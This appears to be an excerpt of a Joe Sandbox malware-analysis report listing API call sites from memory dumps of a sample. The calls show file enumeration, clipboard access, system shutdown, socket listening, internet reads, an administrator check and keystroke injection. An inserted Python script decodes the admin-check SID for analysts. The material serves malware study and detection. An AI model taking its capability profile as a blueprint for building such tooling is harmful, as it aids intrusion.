                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: c13dea57d81e5ae1a400df2f7ea34aad35cf95f9680ad8d0abdbe3c17e4fb3fd
                                                                        • Instruction ID: cc9539397eb20a388d7716daed1bec77cb1039fb1afaa0d1cb5f19fadd54f2f9
                                                                        • Opcode Fuzzy Hash: c13dea57d81e5ae1a400df2f7ea34aad35cf95f9680ad8d0abdbe3c17e4fb3fd
                                                                        • Instruction Fuzzy Hash: 9631AEB190021AAFEF219F60EC84ABF7BB8FB05341F004565F981E6149DB39D921CBA0
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: 7394f484a1b1ead73b21652b7d1904a2b1a4ccc25cea3af58ff0fdbec2a7e2fd
                                                                        • Instruction ID: 3de9c9d3d6e618bb9bd51d9b89b20d50d06ca42faf6436419d42b73d515d889f
                                                                        • Opcode Fuzzy Hash: 7394f484a1b1ead73b21652b7d1904a2b1a4ccc25cea3af58ff0fdbec2a7e2fd
                                                                        • Instruction Fuzzy Hash: 562127317012019FEB22AF24EC19B6E77A8EF88720F008119F9C5EB295DB39AC41CB50
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0104FA83
                                                                        • FindClose.KERNEL32(00000000), ref: 0104FB96
                                                                          • Part of subcall function 00FE52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • Sleep.KERNEL32(0000000A), ref: 0104FAB3
                                                                        • _wcscmp.LIBCMT ref: 0104FAC7
                                                                        • _wcscmp.LIBCMT ref: 0104FAE2
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0104FB80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                        • String ID: *.*
                                                                        • API String ID: 2185952417-438819550
                                                                        • Opcode ID: e27da486dc5078053c360937336c09e492a467f8e4cc000a36b09e796e81b27a
                                                                        • Instruction ID: 367ec3279c812030bc4aa2cb25f1049a443d604e7d1986d08d3fc3e9dfed7dbc
                                                                        • Opcode Fuzzy Hash: e27da486dc5078053c360937336c09e492a467f8e4cc000a36b09e796e81b27a
                                                                        • Instruction Fuzzy Hash: 8841B4B190021F9FDF65EF68CC94AEEBBB4FF05310F1445A5E954A22A0EB359E44CB90
                                                                        APIs
                                                                          • Part of subcall function 01039399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                          • Part of subcall function 01039399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                          • Part of subcall function 01039399: GetLastError.KERNEL32 ref: 0103941D
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 010457B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 1eb2396a16ea844d8839aabb959e49a7bc31e6d8f7b37853854264c2e239803e
                                                                        • Instruction ID: dbd010b7839d2cdf16f6eac532523acf2f978393d5d5ba29a4307987f259c4d6
                                                                        • Opcode Fuzzy Hash: 1eb2396a16ea844d8839aabb959e49a7bc31e6d8f7b37853854264c2e239803e
                                                                        • Instruction Fuzzy Hash: A10184B1A50312EBF769E168BCCBBBF7A98BB05650F1445B9F9D3E60D1D9515C008150
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010569C7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010569D6
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 010569F2
                                                                        • listen.WSOCK32(00000000,00000005), ref: 01056A01
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056A1B
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 01056A2F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 0e785b99db6579c0b8778c103ad013e0e4abc762b9a88bf6ae4f355a3133bef2
                                                                        • Instruction ID: 89992579c02d955f48a9b7203b4ebbc00f3b8be3fac33e0c681033ebe23d7e99
                                                                        • Opcode Fuzzy Hash: 0e785b99db6579c0b8778c103ad013e0e4abc762b9a88bf6ae4f355a3133bef2
                                                                        • Instruction Fuzzy Hash: 8A2101346002019FCB60EF69CC88A6EB7F9EF45720F048658FD96A7385CB75AC01CB91
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FE1DD6
                                                                        • GetSysColor.USER32(0000000F), ref: 00FE1E2A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00FE1E3D
                                                                          • Part of subcall function 00FE166C: DefDlgProcW.USER32(?,00000020,?), ref: 00FE16B4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ColorProc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 3744519093-0
                                                                        • Opcode ID: f93c0df001c816f2356e759594dadca315ddae09c97201618a4df614375e2bde
                                                                        • Instruction ID: 92958590e8fecf585a87a849b2a0bb04a25fbdd147ffa8cb9869fcba1abb4944
                                                                        • Opcode Fuzzy Hash: f93c0df001c816f2356e759594dadca315ddae09c97201618a4df614375e2bde
                                                                        • Instruction Fuzzy Hash: FDA15771505489BAE63C6A6F8C44FBF39ADFB42311F50420AF5C2D6189DA3A9D01F276
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104C329
                                                                        • _wcscmp.LIBCMT ref: 0104C359
                                                                        • _wcscmp.LIBCMT ref: 0104C36E
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104C37F
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0104C3AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: df2ada338395c2ff4c9e58be92a34986a8deba5c5bf4f44eb885e8cb859cacec
                                                                        • Instruction ID: 4abb1080118fa518a15a901771385c1175daa4b3a83317b27f81adbc31cfd8a1
                                                                        • Opcode Fuzzy Hash: df2ada338395c2ff4c9e58be92a34986a8deba5c5bf4f44eb885e8cb859cacec
                                                                        • Instruction Fuzzy Hash: 54519C756046028FE714DF68C9C0AAAB7E4FF49320F00466DF996CB3A1DB30A901CB91
                                                                        APIs
                                                                          • Part of subcall function 01058475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01056E89
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056EB2
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 01056EEB
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056EF8
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 01056F0C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 99427753-0
                                                                        • Opcode ID: 63cf0dfbb5fd6e80d62bd2f07f06084703fe9bbf46909a5ce75bb573be1161d9
                                                                        • Instruction ID: 22836b8b4bd38dd12400fc43a76b09eb23725b4a76b973d355fe2fb4b383c93c
                                                                        • Opcode Fuzzy Hash: 63cf0dfbb5fd6e80d62bd2f07f06084703fe9bbf46909a5ce75bb573be1161d9
                                                                        • Instruction Fuzzy Hash: BE410675A00200AFDB20AF69DC86F7E77E8DF44710F44855CFA45AB3C2CA78AD019BA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: 5615bf71aa66ac1260ec9488d0fd8eb5159b81f041e00595025bad1a0bfb6b46
                                                                        • Instruction ID: 0d925d5660240380abf43ab3a683a8097ba1db5f66eaaaac59e5c95eaaa2d367
                                                                        • Opcode Fuzzy Hash: 5615bf71aa66ac1260ec9488d0fd8eb5159b81f041e00595025bad1a0bfb6b46
                                                                        • Instruction Fuzzy Hash: A91104327006115FE7315F2A8C84A2EBBDDFF857A0F004129F885E7241DB74E9018BE0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime__swprintf
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 2070861257-2409531811
                                                                        • Opcode ID: d28653b7f872bdadde620c754a1356004c2ca022673313cefcdf511b6545b03d
                                                                        • Instruction ID: 245d9a57e8bf1daaa235d7fb44b75fc38d9601fa6f9bde7d0e665d2dbe7d9b33
                                                                        • Opcode Fuzzy Hash: d28653b7f872bdadde620c754a1356004c2ca022673313cefcdf511b6545b03d
                                                                        • Instruction Fuzzy Hash: 65D01272818329EADB159A91CCC4CFD777CBB04100F004496F5C6E2048E27997589B22
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 01044385
                                                                        • _memset.LIBCMT ref: 010443A6
                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 010443F8
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01044401
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                        • String ID:
                                                                        • API String ID: 1157408455-0
                                                                        • Opcode ID: add96f0da79b76a9b9ce95c584f8290113b066c13aaa0f2d3cd0a64f7db3d2a3
                                                                        • Instruction ID: 2536db8005a2307681bb699382fb627dfa0f783028d5034f5aa349ba80e9e7e8
                                                                        • Opcode Fuzzy Hash: add96f0da79b76a9b9ce95c584f8290113b066c13aaa0f2d3cd0a64f7db3d2a3
                                                                        • Instruction Fuzzy Hash: C011AEB5D012287AE7309665AC4DFEBBB7CEF45760F0046D6F544E7180D6744E8087A4
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,01051ED6,00000000), ref: 01052AAD
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01052AE4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: 6498fbd5c8b682982cf82c89ad40256cfefe105f0a244c979485f503a80467f1
                                                                        • Instruction ID: 648a916724a8e66e8bea6fee9a88845077161ff3a6f50fa5fe2d743236afb270
                                                                        • Opcode Fuzzy Hash: 6498fbd5c8b682982cf82c89ad40256cfefe105f0a244c979485f503a80467f1
                                                                        • Instruction Fuzzy Hash: 9B419471A0420AFFFBA1DE58CC84EBFB7FCEF40754F00405AFA85A6185DA719E419A60
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                        • GetLastError.KERNEL32 ref: 0103941D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: 5bf6b58ae679bc1f8f884a949af92ffe4f82ce716feca695b61f2cced0cfb626
                                                                        • Instruction ID: 8313828b08789631d1820acc0f346cc8f9cf856bfcb058e6334d1827e57ee03c
                                                                        • Opcode Fuzzy Hash: 5bf6b58ae679bc1f8f884a949af92ffe4f82ce716feca695b61f2cced0cfb626
                                                                        • Instruction Fuzzy Hash: 141191B1814205AFE728DF54DC85D6BB7FCFB44764B10852EF49A93684EB71AC41CB60
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01044F45
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01044F5C
                                                                        • FreeSid.ADVAPI32(?), ref: 01044F6C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 6cfdf3e7c908a7b91c87aa9c34659455a14fbdc2b0c7e4e81391cfd2b3256ca9
                                                                        • Instruction ID: 37e796a2c4670a98d91a521b4389d679a97c58961e1e98a0fe177d7c7c3474fa
                                                                        • Opcode Fuzzy Hash: 6cfdf3e7c908a7b91c87aa9c34659455a14fbdc2b0c7e4e81391cfd2b3256ca9
                                                                        • Instruction Fuzzy Hash: FCF03C75D1120CBFDB00DEE49889EADBBB8EB08211F0045A9B501E2184D6356A148B50
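The three calls in the block above are the standard "is the current token a member of BUILTIN\Administrators" check: AllocateAndInitializeSid builds a SID with two subauthorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID, 32) and 0x220 (DOMAIN_ALIAS_RID_ADMINS, 544), CheckTokenMembership tests the caller's token against it, and FreeSid releases the SID. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses API reference lines in the report's `Api.MODULE(args), ref: addr` format and rebuilds the SID string the call constructs. The identifier authority is assumed to be SECURITY_NT_AUTHORITY (the report shows that pointer only as `?`), and the sample input is the first block's three lines copied into a string so the code runs offline.

```python
"""Decode Win32 API references from a Joe Sandbox 'APIs' listing."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the three API reference lines of the block above,
# embedded here so the example runs without the report.
SAMPLE_APIS = """
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01044F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01044F5C
FreeSid.ADVAPI32(?), ref: 01044F6C
""".strip()

# Matches "Api.MODULE(args), ref: ADDR", optionally prefixed by the report's
# bullet and its "Part of subcall function XXXXXXXX:" marker.
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption: the SID authority is SECURITY_NT_AUTHORITY (S-1-5); the report
# only shows the pIdentifierAuthority argument as "?".
SECURITY_NT_AUTHORITY = 5

WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-546": "BUILTIN\\Guests",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # hex values resolved to int; "?" becomes None
    ref: int                    # address of the call site


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API reference line in the given text; other lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m.group("args").split(",") if a.strip()]
        args = [None if a == "?" else int(a, 16) for a in raw]
        refs.append(ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return refs


def sid_from_allocate_call(ref: ApiRef) -> Optional[str]:
    """Rebuild the SID string an AllocateAndInitializeSid call produces.

    Argument order: pIdentifierAuthority, nSubAuthorityCount, dwSubAuthority0..7, ppSid.
    Returns None if the subauthority count or any used subauthority is unknown.
    """
    if ref.api != "AllocateAndInitializeSid":
        raise ValueError("not an AllocateAndInitializeSid call")
    count = ref.args[1]
    if count is None:
        return None
    subs = ref.args[2:2 + count]
    if len(subs) != count or any(s is None for s in subs):
        return None
    return "S-1-%d-%s" % (SECURITY_NT_AUTHORITY, "-".join(str(s) for s in subs))


def classify_admin_check(text: str) -> dict:
    """Report whether an API block implements the Administrators membership test."""
    refs = parse_api_lines(text)
    names = [r.api for r in refs]
    alloc = next((r for r in refs if r.api == "AllocateAndInitializeSid"), None)
    sid = sid_from_allocate_call(alloc) if alloc else None
    return {
        "sid": sid,
        "group": WELL_KNOWN_SIDS.get(sid, "unknown"),
        "is_admin_check": sid == "S-1-5-32-544" and "CheckTokenMembership" in names,
        # A SID that is allocated but never freed is a minor bug, not a finding,
        # but it is worth noticing when comparing builds of the same family.
        "leaks_sid": alloc is not None and "FreeSid" not in names,
    }


if __name__ == "__main__":
    print(classify_admin_check(SAMPLE_APIS))
```

The same parser handles the other blocks in this listing (including the `Part of subcall function …:` lines), so it can be pointed at a whole report export to pull out every call site; only the SID reconstruction is specific to AllocateAndInitializeSid.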
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 01041B01
                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 01041B14
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
